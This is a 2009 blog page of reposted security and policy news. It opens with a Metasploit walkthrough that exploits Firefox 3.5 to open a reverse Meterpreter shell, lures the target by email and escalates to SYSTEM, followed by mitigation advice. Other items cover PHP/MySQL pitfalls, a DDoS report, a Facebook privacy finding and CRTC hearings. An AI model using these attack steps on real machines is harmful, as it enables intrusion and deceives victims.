Metasploit has released an exploit for the TraceMonkey component of Mozilla Firefox 3.5's JavaScript rendering engine. The bug is covered in Mozilla's Bugzilla as bug 503286. The first public exploit seen was on Milw0rm by the author SBerry, aka Simon Berry-Byrne, who gives thanks to HD for his help in writing the exploit code; it was later converted by HD into a Metasploit module. The main exploit code is JavaScript generated with the selected payload and then encoded to make it more difficult to detect by HIPS, IPS and IDS systems. A way to use this module would be running msfconsole as root so as to be able to use low ports for our listeners:
carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole
[sudo] password for carlos:

       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux

msf >
We then select the exploit and a Meterpreter reverse TCP shell:
msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
We take a look at the options available:
msf exploit(firefox_escape_retval) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Firefox 3.5.0 on Windows XP SP0-SP3
A recommended way of attacking would be to set the port for the exploit to port 80, since this is the default port for HTTP, which will be the protocol we will use to exploit the browser; we will also set a friendly URI path:
msf exploit(firefox_escape_retval) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_escape_retval) > set URIPATH secret.html
URIPATH => secret.html
For the payload we will set the local host from which we are launching the attack and to which we want the target to connect back. We choose port 443, the default port for HTTPS, since the chances of this port being open in most environments tend to be high:
msf exploit(firefox_escape_retval) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(firefox_escape_retval) > set LPORT 443
LPORT => 443
Now the exploit is run and it will listen for the target's connection:
msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/secret.html
[*] Local IP: http://192.168.1.158:80/secret.html
[*] Server started.
We craft our email or other type of message for the target to read and inform him that he might get a popup stating that the script may have hung, and to just click continue since this is normal. The message that will appear at the target will be something similar to this:
When the client clicks on the link the exploit will be deployed with the payload:
[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.139:1046...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:443 -> 192.168.1.139:1047)
msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: WINXPLAB01
OS      : Windows XP (Build 2600, Service Pack 2).
Since the browser window will hang and might be closed by the target, it is important to migrate off that process as quickly as possible, so we run the migrate script:
meterpreter > run migrate
[*] Migrating to lsass.exe...
[*] Current server process: firefox.exe (1800)
[*] New server process: lsass.exe (684)
meterpreter > sysinfo
Computer: WINXPLAB01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
This exploit differs from the latest ones made public for IE ActiveX controls in that it may require some additional steps to be conducted on the target system to be able to get a shell back. At the time of this writing, this exploit only works on Windows XP SP0 – SP3 with Firefox 3.5.0, and in testing it was found that it did not work 100% of the time: several tries were needed on some of the lab machines while others worked on the first try.
A way to mitigate this attack would be to enter about:config in the Firefox address bar and change the parameter javascript.options.jit.content, or simply to use the NoScript add-on. Mitigation in a large enterprise will be difficult because a GPO (Group Policy Object) cannot be pushed to the client, and a login script is one of the alternatives that will have to be used to mitigate the risk.
Firefox 3.5 (Font tags) Remote Buffer Overflow actively being exploited.
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
After doing my usual digging through my list of malicious URLs for the morning, I came across a site that is actively exploiting the new Firefox vuln using the exploit written by Simon Berry-Byrne. It uses a standard heapspray technique for code exec. The site that is hosting this exploit appears to be a legitimate site that was compromised. It looks like an RFI may have been used to drop the file on the site. The page located at /img/icons/f.htm is a direct copy of the milw0rm code. They did not even bother to remove any of the comments. A simple download-and-execute payload is used.
South Korea to Develop Electromagnetic Pulse Bomb by 2014
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
The South Korean military will have an electromagnetic pulse (EMP) bomb in five years that is capable of crippling an enemy’s command-and-control, communications and defense radar systems.
The Next Hacking Frontier: Your Brain?
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Hackers who commandeer your computer are bad enough but as neural devices become more complicated — and go wireless — some scientists say the risks of “brain hacking” should be taken seriously.
Report of Findings with respect to Facebook
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
(from our backgrounder)
The Office of the Privacy Commissioner of Canada has completed an in-depth investigation into a wide-ranging complaint about the privacy practices and policies of Facebook, a social networking website. The complaint was filed by the Canadian Internet Policy and Public Interest Clinic (CIPPIC).
The investigation was conducted under PIPEDA, the Personal Information Protection and Electronic Documents Act, which is the federal private-sector privacy law.
Our investigation concluded that four aspects of the complaint were well founded. Another four were well founded but considered to be resolved after Facebook agreed to make specific changes to its policies or practices. The final four issues raised by the complaint were dismissed as not well founded.
Here are examples from each of the three categories of our findings.
Well-founded allegation of the complaint: Third-party applications
One key allegation of the complaint that we upheld as well founded related to Facebook’s disclosure of personal information to third-party developers who create applications, such as games, quizzes and classified ads, that run on the Facebook platform. There are more than 950,000 application developers in some 180 countries.
When users add an application, they consent to giving the application’s developer access to some of their personal information, as well as that of their “friends.” Moreover, the only way that users can refuse to share personal information when their friends add applications is by opting completely out of all applications, or blocking specific applications.
Based on our investigation, we recommended that Facebook implement technological measures to restrict application developers’ access only to the user information essential to run a specific application. We also called on Facebook to ensure that users are informed of the specific information that an application requires, and what the purpose is.
We further recommended that users signing up for an application be asked for express consent to provide their personal information to third-party developers. Measures are needed to prohibit all disclosure of the personal information of users who are not themselves adding an application.
Facebook has not agreed to the recommendations.
Well-founded and Resolved allegation of the complaint: Facebook advertising
The complainant alleged that Facebook was not making a reasonable effort to notify users clearly that their personal information is used for advertising purposes.
Our Office examined the two types of ads on Facebook that use personal information – “Facebook ads,” which are targeted to demographic profiles or key words in a user’s profile, and “social ads,” which are triggered by actions such as becoming a fan of a page or joining a particular group.
Social ads are inherently intrusive because they use peoples’ actions, thumbnail photos and names to promote products and services. The ads give the appearance that a user is endorsing a particular product. Users can, however, opt out of this type of ads.
On the other hand, users cannot opt out of Facebook ads. But, because only users can see the ads being targeted at them, we considered them to be less invasive.
We accepted that, as a free service to users, Facebook needs to generate revenue, and that most Facebook users reasonably expect to receive advertisements. However, in light of the prominent role of advertising on the site, we recommended that Facebook explain the role of advertising more fully in its Privacy Policy, and inform users that their profile information is used for targeted advertising purposes.
Facebook agreed in principle to describe advertising more clearly and to configure its systems to allow users to more easily find information about advertising.
Not Well-founded allegation of the complaint: Deception and misrepresentation
The complainant alleged that Facebook was misrepresenting itself by claiming to be purely a social networking site when, in fact, it was engaged in other activities, such as advertising and third-party applications, and did not clearly explain this involvement. The complainant also alleged that Facebook was misrepresenting users’ level of control over their personal information.
We found no evidence that Facebook was willfully misleading or deceiving users about the purposes for which it collects information, or that it is obtaining consent through deception.
The Road Ahead
The Privacy Commissioner has given Facebook 30 days to comply with any unresolved recommendations. During that time, our Office will continue to work with the company to address any outstanding concerns.
Under PIPEDA, the Privacy Commissioner can apply to the Federal Court of Canada to have her recommendations enforced.
Various PHP and MySQL pitfalls
July 14th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
This is a short post, to summarize some of the issues I see with PHP code and the use of MySQL. Not too many people know about these pitfalls, and they give rise to some of the more subtle security issues:
1 – “SQL Overflow”
If a value you insert into a column is too large, it is truncated silently. This can lead to security issues if you don’t validate that the submitted string is of the right length.
2 – “Trailing White Space Ambiguity”
Trailing white spaces are removed by MySQL silently. For example, these two queries retrieve the same result:
select role from user where username='Admin';
select role from user where username='Admin ';
(note the space at the end).
3 – Unbalanced comments
Older versions of MySQL allow /* to be used unbalanced. For example,
select now() /* test
will work. Newer versions of MySQL require balanced comments (unbalanced comments were always “illegal” according to the documentation).
4 – php ‘rand()’ function returns bad results
If the argument exceeds the maximum integer, you will get not-so random numbers back. This one depends a bit on the version of PHP you are using. But you will not get an error. Instead, you will get negative numbers, or numbers that are not random (e.g. only last couple of digits change).
5 – MySQL “--” comments require a white space
In order to use “--” as a comment, it has to be followed by a whitespace.
select now() --test will fail
select now() -- test will work
You don’t have to use a space. A tab will work just fine and evades some filters.
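An added example (not code from the original post) of one way to close pitfalls 1, 2, 3 and 5 in a PHP/mysqli registration and lookup path: byte-length and whitespace validation before the insert, strict sql_mode so truncation raises an error instead of silently succeeding, and a byte-exact lookup so 'Admin ' can no longer resolve to the 'Admin' row. The user table, its column width and the $db connection are assumptions; it needs PHP 7.1+ and the mysqli extension.

```php
<?php
// Added example; assumes a mysqli connection in $db and this table:
//   CREATE TABLE user (username VARCHAR(16) NOT NULL PRIMARY KEY,
//                      role VARCHAR(16) NOT NULL)
// Table and column width are assumptions made for this example.

const USERNAME_MAX_LEN = 16;   // must equal the VARCHAR(16) width of user.username

/**
 * Reject input that MySQL would silently truncate (pitfall 1) or that a
 * padded comparison would treat as equal to another name (pitfall 2).
 * Throws rather than trimming, so what is stored is exactly what was checked.
 */
function validate_username(string $name): string
{
    // Count bytes: the conservative measure when column width is in characters
    // and clients may send multibyte data.
    if ($name === '' || strlen($name) > USERNAME_MAX_LEN) {
        throw new InvalidArgumentException('username length out of range');
    }
    // 'Admin' and 'Admin ' (or "Admin\t") compare equal in MySQL: refuse any
    // surrounding whitespace (space, tab, newline, CR, NUL, vertical tab).
    if ($name !== trim($name)) {
        throw new InvalidArgumentException('username has leading/trailing whitespace');
    }
    // Allow-list the alphabet. With no whitespace, '-', '/' or '*' permitted,
    // the "--<tab>" (pitfall 5) and unbalanced "/*" (pitfall 3) comment tricks
    // cannot ride in on this field even if legacy code builds SQL by hand.
    if (!preg_match('/\A[A-Za-z0-9_]+\z/', $name)) {
        throw new InvalidArgumentException('username contains disallowed characters');
    }
    return $name;
}

/**
 * Insert through a prepared statement and make truncation loud: in strict
 * mode MySQL raises "Data too long for column" instead of cutting the value.
 */
function create_user(mysqli $db, string $name, string $role): void
{
    $name = validate_username($name);
    $db->query("SET SESSION sql_mode = 'STRICT_TRANS_TABLES'");
    $stmt = $db->prepare('INSERT INTO user (username, role) VALUES (?, ?)');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('ss', $name, $role);
    if (!$stmt->execute()) {
        throw new RuntimeException('insert failed: ' . $stmt->error);
    }
    $stmt->close();
}

/**
 * Look up a role by exact username. The first predicate lets MySQL use the
 * primary key; the BINARY predicate compares byte-for-byte, so 'Admin ' does
 * not match the 'Admin' row even if a caller skipped validate_username().
 */
function role_for(mysqli $db, string $name): ?string
{
    $stmt = $db->prepare(
        'SELECT role FROM user WHERE username = ? AND BINARY username = ?'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('ss', $name, $name);
    $stmt->execute();
    $stmt->bind_result($role);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? $role : null;
}

// Usage sketch; the caller is assumed to have opened $db = new mysqli(...).
// create_user($db, 'Admin', 'administrator');
// $role = role_for($db, 'Admin ');   // trailing space: no row is returned
```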
Got some to add? Use the comments.
1984: Changing Perceptions of Surveillance
July 14th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
What if any government had the opportunity to rewrite history, to paste over unflattering narratives and emphasize its purported strengths? I know, unfortunately that isn’t a rhetorical question.
What if 1984, George Orwell’s classic novel about the tyranny of oppression and never-ending surveillance, had been seized and rewritten to promote the work of Oceania, the government in power?
That’s the premise behind Alexander Charchar’s delicate reworking of the book’s cover art.
“ … That which is hard to ignore, is the fact that it’s ugly. Horribly ugly. It’s centered text to the left, with no thought of kerning or, even though an attempt has been made, to have the lines of text balanced. Perfect for a world where such detail in the arts is ignored and, in a sense, repulsed by those with political muscle …”
Charchar felt that previous cover art was intended to reflect the design sensibilities of the decade (the book has been through so many reprintings, there are dozens of past covers ) rather than the anti-totalitarian message Orwell intended to drive into the reader’s heart and mind.
How would a government like that of Oceania approach its communications with its citizens? As a rough and functional necessity – much like the brutalist approach to architecture?
That certainly strikes a chord if you lived through the second half of the twentieth century, when totalitarian governments in Europe and Asia largely emphasized homogeneity and efficiency over creativity.
It’s also a contrast with the reality we face today, where governments continually experiment with nuanced and targeted messages designed to build support for increased security and ever more invasive surveillance measures.
Quick Stats Around the US-KR DDoS Attacks
July 10th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
It’s been a busy week here in the office, between investigating, helping customers and the operator community, investigating some more, and of course talking to the press. Here are some quick stats I have been running this afternoon on the attack using ATLAS data. This data comes from our monitors used in the backbone, monitoring live traffic rates and actual DDoS attacks. We didn’t see all of the attacks against all of the victims (some 47 unique victims counted by ShadowServer by analyzing all of the configuration files) but this, we think, may be representative of the attacks.
The peak attack size we measured was about 182Mbps, or about 428Kpps. The average size of an attack was about 39Mbps. Earlier investigations a couple of days ago showed smaller attacks but I would still classify these as “garden variety” in their intensity (most things below a couple hundred Mbps are pretty easily filtered).
The attacks lasted between a few minutes and 10 hours, with an average duration of about 3 hours.
In almost all cases these were low-level anomalies to the devices monitoring the traffic. The bps and pps (packets per second) rates were barely above thresholds in many cases.
As such our original analysis made a couple of days ago that this was a pretty modest sized attack stands.
No comment on attribution at this point, it’s way too early to tell. Today is the self destruct day, too, for the bots. The “flash.gif” EXE they may have downloaded will gzip up their files and delete the MBR: poof.
Still no definitive idea on how this thing infected its userbase so quickly. 200,000 bots or so according to researchers.
Around the net:
- An analysis by an independent security lab: 77DDoS.pdf
- Korean/U.S. DDoS Attacks – Perplexing, Disruptive, and Destructive from the ShadowServer foundation
Homomorphic Encryption Breakthrough
July 9th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Last month, IBM made some pretty brash claims about homomorphic encryption and the future of security. I hate to be the one to throw cold water on the whole thing — as cool as the new discovery is — but it’s important to separate the theoretical from the practical. Homomorphic cryptosystems are ones where mathematical operations on the ciphertext have…
CRTC Network Management Hearings, Day Three: IFTA & CFTPA, CCD & ARCH, ACTRA, MTS Allstream
July 9th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Day three of the CRTC's network management hearings brought in the views of several additional stakeholders along with the first large telco of the week. Witnesses included the Independent Film and Television Alliance, the Canadian Film and Television Production Association, the Council for Canadians with Disabilities, the ARCH Disability Law Centre, ACTRA, and MTS Allstream.
While all the creator and producer groups expressed support for net neutrality, it was their position on BitTorrent that was particularly noteworthy. Perhaps heralding an end to the demonization of file sharing, ACTRA emphasized that it wants to compete with illegal downloading and that the best way to do that is to ensure that its members can use applications like BitTorrent to distribute their content. In other words, copyright alone won't address their concerns (they added the need for copyright reform) as network management practices that create a level playing field are essential. Meanwhile, the independent producers emphasized the economic potential of BitTorrent-based distribution. Moreover, ACTRA argued that it was not the role of ISPs to determine the legality of content on their networks. That position is a far cry from what groups like CRIA would like to see happen.
The other big story of the day was MTS Allstream arguing that dominant carriers should never be permitted to throttle wholesale services (i.e. they argue that any throttling should only occur at the retail level). This led to repeated discussion about the nature of wholesale services (referred to as GAS or Gateway Access Service), with MTS explaining that wholesale service is not like buying Internet access as a retail customer (it was described as akin to a private virtual network). For that reason, there is no valid claim that congestion concerns are the basis for throttling wholesale services (left unsaid is why a company like Bell would throttle – competition from the very ISPs to whom it supplies wholesale access). The discussion was stunning since it left the distinct impression that the Commission did not fully understand what was at issue in the CAIP throttling case.
There were two other exchanges involving Commissioner Len Katz worthy of note. The first was a question in which he suggested that Bell and Rogers do not have a dominant position in Ontario, something that will be news to the overwhelming majority of broadband subscribers in the province. The second was the recognition that prioritization of content is effectively the same thing as throttling of content, since the effect in both instances is to place some content on a fast lane and other content on a slow one.
These issues may arise again tomorrow when CAIP appears. Today's summary was compiled by Yael Wexler, a law student at the University of Ottawa. Other coverage available from the National Post liveblog, CBC.ca, and the cippic twitter feed (or mine for MTS).
CRTC Net neutrality Hearings – July 8, 2009
CFTPA and IFTA
Summary:
1. Independent producers are important content creators in Canada and the US.
2. The Internet is a necessary tool – sometimes the only tool – for financing, producing and distributing independently produced works.
3. Industry consolidation – the vertical integration of ISPs with production companies – threatens independently produced works with slower distribution in favour of preferential treatment for allied productions.
4. Network congestion must be more clearly defined.
5. Increasing capacity is the best way to ensure broadband service meets demand
6. Traffic management practices must be disclosed and transparent to the customer.
7. Urge the CRTC to reconsider whether ISPs should be immune from s. 27(2) of the Act
Opening remarks:
John Barrack, National Executive Vice-President Counsel, CFTPA:
Come before the CRTC to share the perspective of independent producers – the content creators – at home and abroad on the worldwide issue of ISP traffic control. Since CAIP v. Bell, the CRTC has taken initiative to develop a unified policy on this matter. The Alliance asks that the Internet remain a forum of direct, unfettered access to audiences for independent producers, via wireline or wireless. The Internet is the most efficient distribution method and is necessary for the very viability of Canadian independent production. ISP traffic management practices (ITMPs) create insurmountable barriers for independent producers to monetize their productions. Moreover, ITMPs hinder the innovation of new content-creating (new media) business models and practices. Another concern is that allowing ISPs ITMPs to go unfettered will result in a two-tiered Internet, whereby the big ISPs that are vertically integrated with production companies will give their productions preferential treatment at the expense of independently produced works.
Susan Cleary, Vice President and General Counsel of IFTA
Ms. Cleary highlighted the situation in the United States, having first-hand knowledge of the issues there in her role at IFTA. IFTA puts the focus on independent content creators and the vast potential of the online space to finance, produce and distribute content. In many cases, the Internet is the only way for independent producers to work and recover revenues lost in TV, theatrical and DVD sales. The problem for independent producers is industry consolidation – the ISPs are also the cable, radio, newspaper and production company owners. In 2003 only 18% of US primetime was independently produced. Industry consolidation risks preferential treatment and carriage under the guise of network management of congestion, without a clear justification as to what that is. ITMPs such as throttling and packet forging are likely to contravene s. 27(2) and 36. These offer a reasonableness standard for ITMPs, not targeting of specific applications, given that they represent the only way to access non-conglomerate productions.
Brad Fox – Producer, Strada Films and Rocket Ace Moving Pictures
New media content-creators can't run the costs and risks required by an 'after-the-fact, case-by-case' basis regulatory approach to traffic throttling. Discriminatory ITMPs are being erroneously portrayed by the ISPs as being in the public's interest when they are not at all. The CRTC should use its powers under s.24 to prohibit discriminatory ITMPs. This would promote competition in the ISP industry and set a straightforward standard for acceptable ITMPs.
Dan Hawes – President and Founder of March Entertainment
There are preferred means of managing traffic. First, increasing capacity is the best way to ensure broadband service meets demand. An inquiry to how US federal spending on national broadband infrastructure has worked leaves Canadians with broadband envy. The CRTC's call for national digital media strategy can help in this regard. “One of the pillars of any such strategy must be to reclaim Canada's place as a legitimate leader in broadband speed, access, and affordability.” A second option is to increase last-mile capacity and a third is deploying content delivery networks. There are others; they all indicate that there are other solutions to traffic management other than throttling.
Reynolds Mastin – Associate Counsel, CFTPA
Traffic management practices must be disclosed and transparent to the customer. The CRTC should impose notification requirements on ISPs so that consumers can have a greater understanding of their Internet service and greater control over the service they pay for. We support Score Media's proposal of disclosing the proportion of the physical access link that is dedicated to Internet access, in order to see whether there is ‘fast tracking' of types of files. Another proposal is for symmetrical regulation of wireless and wireline services, by reconsidering whether ISPs should be immune from s. 27(2) of the Act and by including an undue preference/discrimination clause in the New Media Broadcasting Undertakings. CFTPA continues to advocate for the inclusion of ISPs under “broadcast undertakings” and therefore under the purview of the Broadcasting Act.
Questions:
Chair -
The problem with the Alliance's submission is that the CRTC already has laws against undue preference. On what basis can we as regulators believe that “throttling” will be a future business strategy ISPs employ, knowing it is against the law? I'm not convinced that a condition of licence would have better adherence than the same rule as a provision of the law.
Alliance (Reynolds) -
Knowing something is against the law is different from abiding by it, or from hedging your bets that a small-time producer isn't going to fight a big-player ISP on the issue. There is potential for throttling to become the dominant mode of ITMP. If it becomes an established practice, the exigencies of filing a complaint under s. 27(2) could have a damaging impact on independent and emerging producers' ability to get their product to market. The best way to avoid this practice is to include a rule against it as a condition of the licence for an ISP to operate. The difference between having it be a law and a condition of service is the difference between ‘may' and ‘must.'
Chair –
Is it a lie that P2P takes more bandwidth than direct access sites?
Alliance
Comcast decided to throttle all BitTorrent traffic regardless of the content, which they lied about, and then paid people to sit in public hearings about it to contravene the democratic process. The FCC was enraged, and did not fine them, but made them disclose their throttling practices.
Commissioner Timothy Denton –
How did you come up with the three part test?
Reynolds –
The three-stage analysis is common among the people testifying in this proceeding. It asks whether the practice is reasonable and in the public interest, and it provides a clear lens for reaching a decision.
Denton –
Congestion is the basic problem carriers are trying to deal with?
(Alliance) Barrack –
When an ISP is building up its network, it's economically viable to build it up to full capacity. But when you under-provision, you run the risk of congestion. We recognize the need for flexibility in ISP management, except in this one respect of throttling certain types of carriage.
Denton –
Will this allow for the propagation of obnoxious practices by those who would use the public rules to get around them?
Alliance (John) –
Transparency is the answer. We're not suggesting that publishing is the solution, but it would allow for the opportunity for everyone to know what's going on.
Alliance (Reynolds) –
We need to have an informed consumer. As a general principle, when it comes down to how something is being trafficked, the maximum amount of information disclosed is optimal.
Denton -
A complaints-driven process may be necessary but it might give undue weight to one side.
Alliance (John) –
It's extremely useful to hear the voices of the independent producers who can't afford to carry through the entire legal process. We can learn some of the lessons about solutions from other self-regulating models.
Commissioner Leonard Katz –
There is a risk of independent producers being squeezed out by ISP gatekeepers' vertical integration. But if businesses engaged in transactions with non-aligned producers for preferential treatment, how would that be any different from vertical integration? Would you be opposed to that?
Alliance (Cleary) –
Independent producers can't find aggregators interested in those kinds of transactions; they're not interested in one-off productions or even medium-sized catalogues. Hulu is the closest we've come to that type of arrangement.
Katz –
So your issue is broader; you're interested in the way we regard independent productions, as people and as an industry?
Alliance (Barrack) –
Yes, but we're most concerned about this democratic forum of the Internet. Wireless devices are indistinguishable.
Katz –
But you acknowledge why wireless has had a more flexible environment.
Alliance (Fox) –
A significant proportion of our audience that we hadn't anticipated are commuters, who use wireless.
Commissioner Suzanne Lamare –
The last mile in wireless access is spectrum management, which is part of the infrastructure. In order to manage traffic, building on infrastructure is a good way to go. But it's much easier to roll out cable than spectrum. So when you talk about the greatest degree possible of symmetrical regulation of wireline and wireless, the regulations aren't the same because they have different capacities.
Alliance (Reynolds) -
By maintaining scarcity, it creates content management issues and veils it as capacity issues. Scarcity could be used to the advantage of independent producers.
Lamare -
Is it your opinion that P2P is the way for independent producers to monetize their work?
Alliance (Cleary) -
P2P doesn't equal piracy. You can monetize it, and you don't have to go through an aggregator. We don't advocate it industrially because the practices aren't there yet for great monetizing, but it has potential. When people talk about P2P they think BitTorrent, which sometimes has a negative framing as being unprofitable.
Council of Canadians with Disabilities and ARCH Disability Law Centre (ARCH)
Summary:
1. People with disabilities rely on the Internet to improve their quality of life.
2. Traffic management practices must not be directly or indirectly discriminatory, and should not force people with disabilities to forgo their privacy.
3. ARCH presents its own three-step approach to s.36 disputes.
4. The advantageous programs on the Internet and inventive ways of combining programs are too many to count. Therefore a whitelist approach to obtaining special exemptions or recourse for traffic control of necessary services for disabled people is impractical.
Opening remarks:
We advocate and represent the expansion of the world of accessible technology and software applications. We recommend that the CRTC establish clear guidelines for s. 36 against controlling content carriage. However, ARCH welcomes the initiatives only if the guidelines directly make provisions for accessibility, which is their legal obligation, just as it is in privacy considerations. We hope the result will provide accessibility without needing the Commission's specific direction every step of the way or after the fact. ARCH suggests its own three-part test for determinations under s. 36, but that is different from the Oakes-like test the Open Internet Coalition suggested yesterday. However, ARCH would hold off on creating a test for s. 27. If the Oakes-like test is applied to s. 27, the CRTC risks undoing years of s. 27 jurisprudence.
1. Consideration of whether ITMP is caught under s.36
2. Determination of whether the ITMP practice is contrary to law. This is different from the Oakes test. You are asked to determine whether there is a contravention of s. 36 by asking: does it amount to unjust discrimination and is it against the law? An assessment must be made.
3. The practice can be saved if it's found to be neutral or a positive intervention. Then the min impairment test may apply (as suggested by the OIC).
Expert Dr. Gregg Vanderheiden:
People with disabilities are now enjoying a greater lifestyle due to the many services of the Internet. The captioning of non-captioned movies by crowd sourcing, availability of film and entertainment outside of the regular channels of commerce for people with intellectual or social disabilities are just some examples of how the Internet can be used advantageously for disabled people. We're looking for a level playing field, where people with disabilities can use programs without needing to register them as ‘special' or name themselves.
Traffic management needs to be non-discriminatory. ISPs that require consumers to use specific programs rather than those of their choosing preclude people with disabilities from finding the programs that are best for their circumstances. Users must be free to use any combination of programs, whether it's preferred by the ISP or not, so that they can use the Internet freely and to better their lives like everyone else.
Whitelisting is not a solution; it would be impractical because of the tailoring to individuals' needs. Also, it's not that these people are using alternative programs, it's that they're using mainstream programs in different ways in order to accommodate their needs. Whitelisting can also be used to target people for marketing, or to discriminate against them for employment or insurance purposes, which the individuals do not want.
People with disabilities do not require significantly larger bandwidth, but it may be needed in some areas. For example, phone calls: talking needs less bandwidth than video with sign language, so the latter requires higher bandwidth. However, both of these are nothing compared to an HD movie. But if an ISP decides that the audio is important but not the video, it affects people with disabilities. Disclosure of ITMPs is critical for people with disabilities. Accordingly, the CRTC must not take a wait-and-see approach and troubleshoot problems only after they occur.
Questions:
Chair –
You're saying that when private information exists, the ISPs will use it in wrong ways, for marketing for instance. But there is no grounding for an assumption that the ISP will give out private info to marketers about people with disabilities.
ARCH –
Well, when things are vertically integrated, like they are in the US, the ISPs can misuse their customer information in a manner that violates privacy. ID fraud happens all the time; once you're in databases and specific personal info is out there, it is out there and you're vulnerable to targeting. There is information harvesting done from sources of information. Our concern is with whitelisting. For the ISP to take that information for service provision purposes, the ISP is doing more than just being a pipeline; it advertises and directs users to a server with advertising. It is a common practice for ISPs to direct specific advertising.
Commissioner Leonard Katz -
Self identification levels the playing field and helps people with disabilities. But you're saying that whitelisting won't work. So what will work?
ARCH – -
If barriers to accessibility on the Internet are broken down, and the creation of software applications continues, then we'll get to a place where one won't need to self-identify as disabled. If the CRTC does this right, people won't need to declare themselves and forgo their privacy. We're not saying that if you want a discount you shouldn't have to self-identify, but just for disabled people to get the regular service, at the regular price, shouldn't demand self-identification.
Katz -
If the CRTC were going to look into getting special rates for people with disabilities, how much would that cost?
ARCH -
The amount is minimal because for instance, the cost of having captions doesn't increase even if bandwidth does, it's a standard price. The Internet provides the option of not needing extra costs like other telecoms need. The Internet gives us the option for multiple types of communication at once; if we are able to use the Internet without barriers, there is the potential for no extra costs and time for people with disabilities.
Alliance of Canadian Cinema, Television and Radio Artists (ACTRA)
Summary:
1. ISPs giving undue preference to their content threatens the content creators' ability to reach audiences
2. Traffic throttling is an abuse of power by the ISPs
3. ITMPs are against the Telecommunications Act and moreover, ISPs should be governed by the Broadcasting Act.
4. ITMPs should be a temporary solution, the need for which should be publicly justified as it happens by the ISPs
Opening remarks
Ferne Downey – National President
Canadian artists do not want the CRTC to hand over the keys of the Internet to Canadian ISPs. We help create the content, and so we're worried about Internet traffic management. More Canadians are using the Internet to access our work. About 70% of Canadian Internet usage is for AV files, and the Internet is helping us to compete in local and international markets.
Two specific concerns:
1. The risk of ISPs giving undue preference to content they own: The ability of the Internet to provide open access is threatened if ISPs can give preference to their own content.
2. The potential of ISPs to slow down Internet traffic – to abuse their power as gatekeepers: Vertical media integration is a threat to diversity and the same is true for ISPs.
Stephen Waddell – National Executive Director
P2P protocols like BitTorrent (BT) receive undue criticism from the ISPs as a scapegoat for traffic control. BT is the standard for distributing large files for legitimate copyright holders (even CBC used it to distribute “Canada's Next Great PM”). ACTRA is not endorsing illegal file sharing, but it's not the job of ISPs to determine the legality of files going through their networks. Therefore, ITMP is against the Telecommunications Act. Moreover, we ask that the CRTC reconsider its jurisdiction over ISPs under the Broadcasting Act.
Traffic management should be used only to avoid serious problems and as a temporary solution to them.
The CRTC should regulate it according to the following principles:
1. Onus should be on ISPs to prove they need to manage traffic to manage the integrity of the system
2. ISPs must fully disclose what types of traffic mgmt practices they are using and when
3. There should be no discrimination as between wholesale and retail clients
4. There should be no discrimination as between end users
5. There should be no differential treatment between different applications of content
6. The only exceptions to these principles would be the ability for ISPs to give preferential access to any emergency service authorized by public authorities.
Questions:
Chair –
This is a utopian picture you're painting. The fact is that there's more usage than their pipes can carry, just like cars on roads, and we have to make regulations and discriminate fairly. So how can you come here and say that there should be no throttling or controlling? Presumably, ISPs are doing the best they can; after all, they're business people who want to satisfy their customers. We clearly have more demand than capacity.
ACTRA (Waddell answered all the questions) –
It is utopian indeed. ISPs who are making significant profits should reinvest in their own system, their own infrastructure. ACTRA had no hard evidence to present to the Chair when he asked for evidence of self-preferences occurring contrary to the law.
Chair –
In terms of p2p, is your industry a heavier user of p2p than others? Will ITMP hurt Canadian film industry harder than anybody else?
ACTRA -
Yes. Since the Canadian AV industry relies on P2P heavily.
MTS Allstream
Summary:
1. Competition in the market should be promoted because that would obviate the need for regulation or traffic controlling
2. ITMPs should never be imposed on a wholesaler from the dominant carrier. ITMPs should only be in a retail context.
3. The CRTC should implement a case-by-case approach to assessing and justifying ITMPs.
Opening remarks:
Theresa Griffin-Muir – VP, Regulatory Affairs
Kelvin Shepherd- President of the consumer market division
Paul Frizado – Chief Information and Technology Officer
Principles:
1. Competition in the market should be promoted because it has a direct impact on the need for regulation. The UK example illustrates our point that the more competition there is, the less need there is for Internet neutrality regulation. Each ISP can decide how best to manage its own practice and consumers can choose among them.
